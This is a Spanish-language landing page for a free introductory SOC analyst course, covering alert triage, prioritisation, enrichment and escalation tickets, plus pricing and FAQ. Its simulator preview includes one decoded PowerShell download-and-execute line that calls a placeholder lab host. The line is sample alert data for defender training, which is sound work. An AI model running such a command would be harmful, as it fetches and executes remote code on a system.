IntroductorioGratis3h de contenido · 2 laboratorios guiados200 XP

SOC Analyst: Your First Shift

El trabajo de entrada en un SOC, enseñado como oficio y no como título. Leer los seis campos de una alerta, aplicar cuatro preguntas de triaje en orden, priorizar una cola de cuarenta, enriquecer un indicador sin avisar al atacante y escribir un ticket de escalado que L2 acepte. Gratis, tres horas y sin experiencia previa.

Gratis para siempre. Sin tarjeta, sin prueba y sin caducidad.

Vive la experiencia del estudiante

Sin login · Demostración interactiva gratuita

Prueba demostración →

2

Laboratorios guiados

Entorno de VM aislado

3h

Horas de formación

Labs, prácticas, evaluaciones y simulaciones

3

Módulos

Dificultad progresiva

2–4h

Por sesión de laboratorio

Reinicios ilimitados

HTKQué incluye este curso
  • El curso completo: lecciones escritas con diagramas
  • Exámenes por módulo para comprobar qué has asimilado
  • Laboratorio simulado: tría la cola de tu primer turno
  • Puedes entregar el trabajo final
  • Acceso permanente, sin tarjeta
  • Laboratorio en VM aislada y certificado corregido: desbloqueo de 24 €
0

Sin tarjeta

Empezar gratis →

Herramientas de laboratorio que usarás

ElasticSIEMSysmonEndpoint logsZeekNetworkVirusTotalScannerElasticSIEMSysmonEndpoint logsZeekNetworkVirusTotalScanner
urlscan.ioScannerWHOISReconMITRE ATT&CKFrameworkurlscan.ioScannerWHOISReconMITRE ATT&CKFramework

Antes de comenzar — respuestas rápidas

El curso es gratis: todas las lecciones, todos los cuestionarios y el laboratorio simulado del módulo 2, que es un ejercicio de triaje real y no una demostración. Necesitas una cuenta, pero no tarjeta. Dos cosas son de pago y preferimos que lo sepas ahora: el laboratorio final, que enciende una VM Linux real para ti, y la corrección humana de tu ticket. Ese desbloqueo son 24 € en un único pago.

Solo con el desbloqueo de 24 €. El certificado depende de que un instructor corrija y apruebe tu ticket de escalado, y esa revisión es la parte de pago. Escribir y entregar el ticket es gratis: simplemente queda sin corregir hasta que lo desbloquees.

No. El curso da por hecho que nunca has visto una consola de SOC. Tampoco supone que sepas qué es un EDR, qué aspecto tiene un registro de proxy o qué significa L2: todo eso se explica la primera vez que aparece.

No, y responden a preguntas distintas. El de introducción responde «qué es esta profesión y dónde encajo yo». Este responde «cómo es de verdad el trabajo de entrada un martes cualquiera». Se solapan poco y puedes empezar por cualquiera, aunque el de introducción es más suave si partes de cero absoluto.

Temario del curso

3 módulos · 3h de contenido

Cada fase corresponde a un módulo de este curso. Desplázate para ver cómo se construye el temario, módulo a módulo.

1

Módulo 1

Introductorio

Qué es un SOC y cómo se mide tu trabajo

  • Qué hace de verdad un SOC y, igual de útil, qué no hace
  • L1, L2 y L3: qué se hace en cada nivel y dónde está el traspaso real
  • Los tres orígenes de las alertas, y cómo la telemetría se convierte en regla y la regla en alerta
  • Los falsos positivos como el problema real del oficio, no como una queja
  • El SLA: el reloj que corre de verdad, y el error contrario de cerrar demasiado rápido
  • Las métricas que miden calidad en lugar de velocidad, y por qué deciden qué abres primero
  • La fatiga de alertas: el riesgo real para tu criterio, y qué haces al respecto
  • Examen del módulo
2

Módulo 2

Introductorio

Triaje — de la alerta al veredicto

  • Anatomía de una alerta: los seis campos que miras siempre
  • Las cuatro preguntas del triaje, siempre en este orden: ¿es real?, ¿hasta dónde llega?, ¿qué impacto tiene?, ¿escalo o cierro?
  • Por qué saltarse la segunda y la tercera es reenviar y no triar, y por qué ese ticket vuelve
  • Prioridad: ordenar cuarenta alertas por valor del activo, confianza en la señal y severidad
  • Por qué la severidad que trae la alerta es una opinión, no un hecho
  • Enriquecer un indicador sin contaminar el caso ni avisar al atacante
  • Interpretar lo que devuelve el enriquecimiento, y las dos trampas frecuentes
  • Escribir el ticket de escalado que L2 no te devuelve: uno malo y ese mismo bien hecho
  • Laboratorio simulado «tu primer turno» y tres cuestionarios del módulo
3

Módulo 3

Introductorio

Los cuatro casos que vas a ver, y hacia dónde seguir

  • Caso 1 — un usuario reporta un correo: qué compruebas y en qué orden
  • Caso 2 — el EDR marca un binario: detección real o ruido
  • Caso 3 — tráfico raro de madrugada: qué aspecto tiene un beacon
  • Caso 4 — un acceso imposible: una cuenta usada desde donde no debería
  • Laboratorio final en VM real: un turno completo sobre registros sin filtrar
  • Entregable final: un ticket de escalado, corregido por lo que se valora en uno de verdad
  • Cómo se corresponden los cuatro tipos de alerta con las especialidades, para elegir con criterio

Qué aprenderás

  • Explain what an L1, L2 and L3 analyst actually do, and where the handover is
  • Follow an alert back to the telemetry and the rule that produced it
  • Triage an alert with four questions instead of guessing
  • Order a queue of forty alerts by severity, asset value and confidence
  • Enrich an indicator without warning the attacker you are looking
  • Write an escalation ticket that L2 does not send back
  • Recognise the four alert families and pick a specialism with criteria

Laboratorio práctico

El laboratorio simulado del módulo 2 te da la evidencia ya recortada. El final no: tienes una VM Linux con los registros de una jornada completa de una organización ficticia —correo, autenticación, proxy, EDR y una captura de red— sin filtrar, con el volumen y el ruido reales, y las herramientas de línea de comandos que hay en cualquier sitio: grep, jq, zeek-cut y un visor de PCAP. El incidente que hay dentro entrelaza los cuatro casos del módulo: un correo abre la puerta, un binario se ejecuta, el equipo empieza a hablar hacia fuera y una cuenta acaba usada desde donde no debería. Ninguna alerta lo cuenta entero. Reconstruyes el orden real de los hechos —que no es el orden en que llegaron las alertas—, mides cuántos equipos y cuántas cuentas están afectados, extraes los indicadores que un equipo de red podría bloquear hoy y decides qué se contiene primero, justificándolo. Cada flag exige cruzar dos fuentes; ninguna se contesta de memoria.

2⬡ 2 laboratorios guiados
2–4hTiempo disponible por sesión
IlimitadosReinicios
Validación automática de flags
Experimenta una vista previa del laboratorio →

Requisitos

  • ·No prior experience — the course assumes you have never seen a SOC console
  • ·A computer with a browser. Nothing to install: the simulated lab runs in the browser
  • ·Around three hours

Qué es gratis y qué añade el desbloqueo de 24 €

Lo decimos aquí y con claridad para que nada te sorprenda a mitad del curso.

Gratis, con una cuenta

  • Todas las lecciones y módulos, de principio a fin
  • Los exámenes de cada módulo, con intentos ilimitados
  • Los análisis guiados paso a paso
  • Puedes entregar el trabajo final
Ver cómo funciona el simulador →

Desbloqueo Pro

24 €
  • +El laboratorio real: tu propia VM aislada, que arrancas cuando quieras
  • +Un instructor revisa y corrige personalmente tu trabajo final
  • +El certificado HTK, que depende de esa corrección aprobada

Un solo pago, sin suscripción. Comprar cualquier curso de pago de HTK ya incluye este desbloqueo, así que nunca lo pagas dos veces.

Y esto es exactamente lo que desbloqueas

Sin capturas de marketing: las tres piezas, tal y como se ven por dentro.

1

El laboratorio real

Tu propia máquina virtual en la nube, aislada y sólo tuya, con las herramientas ya instaladas. La arrancas cuando quieras desde el navegador y se destruye al terminar.

Muestra del panel del laboratorio. Los tiempos son de ejemplo.

2

Tu entregable, corregido por una persona

Entregas tu informe y un instructor lo lee, lo puntúa sobre 100 y te escribe qué has hecho bien y qué falta. No es un corrector automático. De esa nota depende el certificado.

Ejemplo de corrección. La nota y el comentario son de muestra.

3

El simulador completo

Un turno en la cola de alertas, con el reloj corriendo: llega telemetría, salta una regla, la alerta cae en tu cola y tienes que triarla. Practicas la decisión que define el puesto: por dónde empezar y qué es un falso positivo.

Cola de alertas SOCen pausa

Telemetría del endpoint

10.4.2.21 WINWORD.EXE opened Factura_Marzo.docm

10.4.2.21 WINWORD.EXE -> spawned powershell.exe

10.4.2.21

ReglaEDR-PS-ENC-02coincide

Cola

0 sin cerrar

Sin alertas

Comando decodificado

IEX (New-Object Net.WebClient).DownloadString('https://telemetry-cdn.htk-lab.invalid/a')

El reloj de cada alerta corre mientras investigas, y la severidad la puso una regla que no sabía qué equipo era. Decidir por dónde empezar es el ejercicio.

Interfaz real del simulador «Cola de alertas SOC». Aquí se reproduce sola; con el desbloqueo la trabajas tú.

Preguntas frecuentes

Respuestas completas sobre este curso, laboratorios, certificados y reembolsos

El curso es gratis: todas las lecciones, todos los cuestionarios y el laboratorio simulado del módulo 2, que es un ejercicio de triaje real y no una demostración. Necesitas una cuenta, pero no tarjeta. Dos cosas son de pago y preferimos que lo sepas ahora: el laboratorio final, que enciende una VM Linux real para ti, y la corrección humana de tu ticket. Ese desbloqueo son 24 € en un único pago.

Solo con el desbloqueo de 24 €. El certificado depende de que un instructor corrija y apruebe tu ticket de escalado, y esa revisión es la parte de pago. Escribir y entregar el ticket es gratis: simplemente queda sin corregir hasta que lo desbloquees.

No. El curso da por hecho que nunca has visto una consola de SOC. Tampoco supone que sepas qué es un EDR, qué aspecto tiene un registro de proxy o qué significa L2: todo eso se explica la primera vez que aparece.

No, y responden a preguntas distintas. El de introducción responde «qué es esta profesión y dónde encajo yo». Este responde «cómo es de verdad el trabajo de entrada un martes cualquiera». Se solapan poco y puedes empezar por cualquiera, aunque el de introducción es más suave si partes de cero absoluto.

Por sí solo, no. Tres horas no hacen eso, y quien te prometa lo contrario te está vendiendo algo. Lo que sí consigues es hablar del triaje como funciona de verdad, y terminar sabiendo si el trabajo te atrae antes de invertir meses en él.

El módulo 3 está hecho justo para eso. Los cuatro tipos de alerta que aprendes a triar se corresponden con las especialidades del catálogo —malware, phishing y OSINT, threat hunting, seguridad de redes—, así que eliges dirección según qué casos te gustó trabajar.

No. Cualquier compra de un curso de pago de HTK incluye los laboratorios y las correcciones de los cursos gratuitos, así que nunca te encontrarás un muro dentro de un curso pensado para presentarte la plataforma.

Después de este curso

Y entonces eliges la especialidad que encaja contigo

Este curso existe para que elijas con criterio en lugar de a ciegas. Cuando sepas qué lado de la profesión te atrae, cada ruta te lleva de principiante a intermedio con los laboratorios que le corresponden.

Ver rutas formativas →
¿Listo para subir de nivel?

Empieza hoy con la ciberseguridad

Tres horas, sin conocimientos previos y un correo de phishing real que desmontar. Crea una cuenta y empieza.

GratisSin tarjeta
Sin tarjetaAcceso permanenteEmpiezas en menos de un minuto